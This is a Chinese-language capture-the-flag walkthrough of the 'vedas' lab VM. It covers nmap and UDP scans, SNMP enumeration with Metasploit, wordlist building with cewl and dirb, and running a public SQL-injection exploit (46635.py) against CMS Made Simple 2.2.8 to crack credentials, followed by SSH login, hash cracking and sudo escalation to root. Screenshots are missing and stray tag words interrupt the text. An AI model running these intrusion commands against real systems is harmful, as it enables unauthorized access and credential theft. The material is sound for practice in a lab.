vedas靶机渗透攻略

2022年01月14日 阅读数:5
这篇文章主要向大家介绍vedas靶机渗透攻略,主要内容包括基础应用、实用技巧、原理机制等方面,希望对大家有所帮助。

信息收集

nmap扫描

nmap -sC -sV 192.168.93.0/24 -p-
python

在这里插入图片描述

目标192.168.93.135 开放22ssh 80httpweb

网站信息收集

在这里插入图片描述

首页没啥东西
目录爆破也没啥,22端口爆破太费劲…
sql

扫描udp协议

tcp没思路,扫扫udp
nmap -sU -sV 192.168.93.135
在这里插入图片描述ssh

68dhcp没啥用,161snmp却是有点意思
tcp

msf探测snmp信息

search snmp
svg

use 25
在这里插入图片描述网站

在这里插入图片描述

发现一个flag,并提示去root的方式 一串神秘字符 0e462097431
那就干脆爬取一下网站关键字,获取可能的用户
3d

网站关键字爬取

cewl http://192.168.93.135 -w user.txt
code

在这里插入图片描述

目录爆破

带上刚才爬取到的信息去爆破目录
dirb http://192.168.93.135 user.txt
xml

在这里插入图片描述

多了一个链接 http://192.168.93.135/Kashyapa/
访问一下
在这里插入图片描述

发现cms版本 CMS Made Simple version 2.2.8
在这里插入图片描述

漏洞利用

searchsploit CMS Made Simple
在这里插入图片描述

找一找适用于2.2.8版本的exp
在这里插入图片描述

也就这个sql注入能用
可能出现报错-缺乏termcolor模块
官网下载导入 https://pypi.org/project/termcolor/#files

在这里插入图片描述

python 46635.py -u http://192.168.93.135/Kashyapa/ --crack -w usr.txt

在这里插入图片描述

获得帐密 登陆后台
在这里插入图片描述

发现flag2
在这里插入图片描述

又提示神秘字符串 906509019

尝试ssh登陆,结果成功了,省的传马了
在这里插入图片描述

在/opt/test下发现 了flag3
在这里插入图片描述

又获得一串神秘数字562988736854

提权

0e462097431906509019562988736854 一看就是个MD5
解密后获得240610708
在这里插入图片描述

看看有啥用户能登陆
在这里插入图片描述

root进不去,vedas却是进去了 ,看看sudo权限,啥都有!
在这里插入图片描述

提权成功,拿到flag!